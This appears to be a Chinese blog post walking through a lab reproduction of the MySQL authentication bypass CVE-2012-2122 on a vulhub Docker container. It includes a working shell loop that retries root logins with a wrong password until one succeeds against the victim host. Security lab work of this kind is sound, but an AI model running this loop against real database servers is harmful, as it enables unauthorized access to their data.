首页 > 数据库 >Mysql 身份认证绕过漏洞(CVE-2012-2122)

Mysql 身份认证绕过漏洞(CVE-2012-2122)

时间:2022-10-20 14:45:05浏览次数:79  
标签:12.137 2122 主机 Mysql 192.168 mysql CVE

参考文章:http://t.csdn.cn/CJuGe

搭建环境

https://vulhub.org/#/environments/mysql/CVE-2012-2122/

主机准备

准备两台主机,
一台ubuntu(192.168.12.137),一台kail,均处于同一内网环境下。
其中kail作为攻击主机,ubuntu作为受害主机。

环境搭建

进入目录环境
image
执行如下命令:

docker-compose up -d

image
环境启动成功

尝试攻击

先使用正确的密码登录看看是否成功启动环境
在kail主机的命令行输入命令

mysql -h 192.168.12.137 -u root -p123456 -P3306

image

写如下shell脚本,并执行。
payload.sh

for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.12.137 -P3306 ; done

命令行执行

bash payload.sh

image
利用成功

标签:12.137,2122,主机,Mysql,192.168,mysql,CVE
From: https://www.cnblogs.com/xjy881/p/16809817.html

相关文章

  • MySQL5.7二进制安装
    1、上传安装包到服务器,并解压tarzxvfmysql-5.7.33-linux-glibc2.12-x86_64.tar.gz-C/usr/local/mv/usr/local/mysql-5.7.33-linux-glibc2.12-x86_64/usr/local/my......
  • Sqoop使用mysql上传表到Hive报错
      前几天建民老大给我们进行了第二次的Hive测试,很遗憾,题目很简单,但是我一下午一项都没实现。  而导致我最终也没实现的原因,就是sqoop的一些配置的问题。  因为建民......
  • MySQL高级查询
    1.子查询、联合查询--selectmax(score)fromstu--子查询select*from(selectmax(score)fromstu)s1;--子查询,查询最高分的学生信息select*fromstuwhe......
  • 更多企业数字化转型的新选择,华为云数据库RDS for MySQL值得信赖!
    随着新一轮科技革命和产业变革的到来,大数据、云计算、物联网、人工智能、区块链等新一代信息技术已融入千行百业,深刻改变着人们的生产和生活方式。但在发展过程中,企业遇到了......
  • 国货当自强,华为云数据库GaussDB(for MySQL)的崛起
    企业数据经过长时间的累积下,传统数据库已经进入性能和容量瓶颈,如计算资源的浪费、存储资源的浪费、网络资源的浪费、添加只读的进程缓慢、复制延迟、备份恢复速度慢等等,这些......
  • 国货之光,华为云数据库GaussDB(for MySQL)
    随着互联网的普及,数据上云已经成为一种常态,从而催生出数据库行业的急速发展。云数据库作为一个新的概念,它是通过虚拟化技术将计算机与其他设备进行连接并存储和处理大量信息......
  • MySQL CRUD操作
    1.DDL(DataDefinitionLanguage)数据库定义语言statementsareusedtodefinethedatabasestructureorschema.DDL是SQL语言的四大功能之一。用于定义数据库的三级结......
  • ICMP timestamp请求响应漏洞CVE-1999-0524解决方法
     ICMPtimestamp请求响应漏洞CVE-1999-0524解决方法1、添加进和出的规则firewall-cmd--permanent--direct--add-ruleipv4filterINPUT0-pICMP--icmp-typetime......
  • mysql数据索引,加快查询速度
    一、什么是索引?在mysql中,索引是一种特殊的数据库结构,由数据表中的一列或多列组合而成,可以用来快速查询数据表中有某一特定值的记录。通过索引,查询数据时不用读完记录的所......
  • windowsServer服务器启动mysql报错解决方案
    PS:在最近用windowsServer部署应用的时候,由于项目使用的mysql的绿化版本,启动的时候会报错,刚好记录下来解决方案,让后面的人不踩坑,能看到这个文章也是缘分吧。所需文件下载......